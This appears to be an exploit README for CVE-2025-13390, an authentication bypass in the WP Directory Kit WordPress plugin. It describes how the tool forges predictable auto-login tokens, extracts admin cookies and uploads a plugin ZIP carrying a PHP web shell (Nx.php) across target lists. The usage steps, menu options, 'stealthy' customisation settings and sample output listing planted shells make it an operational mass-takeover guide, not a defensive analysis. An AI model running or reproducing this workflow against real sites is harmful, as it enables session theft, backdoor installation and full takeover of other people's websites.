## https://sploitus.com/exploit?id=55B9AD0C-1232-505A-8605-4F82EAD9EF54
# CVE-2025-13390
WP Directory Kit <= 1.4.4 - Authentication Bypass to Privilege Escalation via Account Takeover
# π¨ CVE-2025-13390 β WordPress WP Directory Kit Authentication Bypass & Remote Code Execution
## π Description
> **The WP Directory Kit plugin for WordPress is vulnerable to authentication bypass in all versions up to, and including, 1.4.4 due to incorrect implementation of the authentication algorithm in the `wdk_generate_auto_login_link` function.**
>
> This is due to the feature using a cryptographically weak token generation mechanism. This flaw makes it possible for **unauthenticated attackers** to gain administrative access and **achieve full site takeover** via the auto-login endpoint with a predictable token.
>
> - **CNA:** Wordfence
> - **Base Score:** 10.0 CRITICAL
> - **Vector:** `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H`
---
## β‘ Exploit Features
- **Cookie Extraction:** Efficient automatic extraction of WordPress authentication cookies.
- **Plugin Uploader:** Remote plugin (ZIP) upload with direct shell deployment (expects shell named `Nx.php`).
- **Fully Automated:** Uses multi-threading for blazing fast exploitation across a large list of targets.
- **Detailed Logging:** Results are clearly split into successful cookies, shells, and a full upload log.
- **Customizable:** User can set threads, target user ID, token, custom ZIP/plugin names, and more for stealthy/personalized attacks.
- **Banner & Usage Guides:** Professional UI with clear prompts for each required variable.
---
## π How The Vulnerability Works
1. **Weak Token Generation:**
The plugin uses an insecure, easily predictable logic to generate one-click login tokens based on user IDs.
2. **Predictable Auth Bypass:**
Attacker generates the token for any user (default: ID 1 = admin) and requests an auto-login link.
3. **Session Hijack:**
On success, the script extracts valid admin session cookies.
4. **Remote Plugin Upload:**
Leveraging the admin cookies, it uploads a malicious ZIP (plugin containing a PHP shell).
5. **Full Site Takeover:**
Shell access is provided via the predictable plugin path (`Nx.php`).
---
## π Usage Instructions
### 1. π Install Required Dependencies
```bash
pip install -r requirements.txt
# Or individually:
pip install requests beautifulsoup4 colorama
```
### 2. π¦ Prepare Your Payload
- **Default ZIP:** The script expects a ZIP file (`Nxploited.zip`) containing your shell named **Nx.php** in the root.
- **Custom Plugin Name:** You can specify another ZIP/plugin folder in the menu.
### 3. ποΈ Create List of Targets
- Prepare a list file (default: `list.txt`) with one URL/host per line.
- Hosts can include schema (`http(s)://`) or just domains/IPs.
```txt
http://vuln-site1.tld
https://vuln-site2.tld
192.168.56.101
```
### 4. βοΈ Run the Exploit
```bash
python3 CVE-2025-13390.py
```
- The script presents an interactive menu:
- **Targets file:** Defaults to `list.txt`
- **Threads:** Highly recommended to keep at 8+ for speed
- **Target user ID:** Defaults to admin (1)
- **Token:** Will auto-suggest a valid predictable token for the user ID
- **ZIP path:** Defaults to `Nxploited.zip`
- **Plugin folder name:** Auto-extracted from ZIP, you can customize
### 5. π Result Files
- `success_cookies.txt` β Sites where successful admin cookies were extracted.
- `success_shells.txt` β URLs of successfully uploaded shells.
- `uploads_log.txt` β Full log of plugin upload attempts.
---
## π₯οΈ Example Run
```
_______ __ __ _______ _______ _______ _______ _______ ____ _______ _______ _______ _______
| || | | || | | || _ || || | | | | || || _ || _ |
| || |_| || ___| ____ |____ || | | ||____ || ____| ____ | | |___ ||___ || | | || | | |
| || || |___ |____| ____| || | | | ____| || |____ |____| | | ___| | ___| || |_| || | | |
| _|| || ___| | ______|| |_| || ______||_____ | | | |___ ||___ ||___ || |_| |
| |_ | | | |___ | |_____ | || |_____ _____| | | | ___| | ___| | | || |
|_______| |___| |_______| |_______||_______||_______||_______| |___| |_______||_______| |___||_______|
By: Nxploited (Khaled ALenazi)
Telegram: @Nxploited
GitHub: https://github.com/Nxploited
Professional WordPress cookie exploit & plugin uploader.
Features: Extracts login cookies, uploads plugin (default: Nxploited.zip), expects shell as Nx.php.
Results: Successful shells in success_shells.txt, successful cookies in success_cookies.txt.
Highly automated. Multi-threaded. For authorized auditing only.
Targets file [default: list.txt]:
Threads [default: 8]:
Target user ID [default: 1]:
Token [default: a1b2c3d4e5]:
Plugin ZIP file path [default: Nxploited.zip]:
Plugin folder name? [default: Nxploited]:
Reminder: Ensure your shell file INSIDE the plugin ZIP is named Nx.php.
Loaded 42 targets, 8 threads.
...
[SUCCESS] http://victim.com: Cookie extracted
[SHELL] http://victim.com/wp-content/plugins/Nxploited/Nx.php
...
Done. Shell URLs in success_shells.txt, cookies in success_cookies.txt.
```
---
## π Arguments & Customization
- **Targets file:** Any txt file (one host per line)
- **Threads:** Integer (`8`, `16`, etc.)
- **User ID:** WordPress user integer (typically `1` = admin)
- **Token:** Leave blank for smart auto-generation
- **ZIP path:** Path to your plugin payload
- **Plugin folder:** The subfolder under `/wp-content/plugins/` for your payload (default taken from zip name)
---
## β οΈ Ethical Notice & Disclaimer
- **For authorized auditing and educational purposes only.**
- The tool is provided βas isβ for risk assessment and penetration testing by authorized personnel solely.
- You must have explicit permission before testing any system with this tool.
- **Developer assumes no liability for misuse or damage.**
---
## π¨βπ» Author & Contact
- By: Nxploited (Khaled ALenazi)
- Telegram: [@Nxploited](https://t.me/Nxploited)
- GitHub: [https://github.com/Nxploited](https://github.com/Nxploited)
- #Nxploited
---
## π§Ύ References
- [Wordfence Advisory](https://www.wordfence.com/)
- [CVE-2025-13390](https://vulners.com/cve/CVE-2025-13390)
---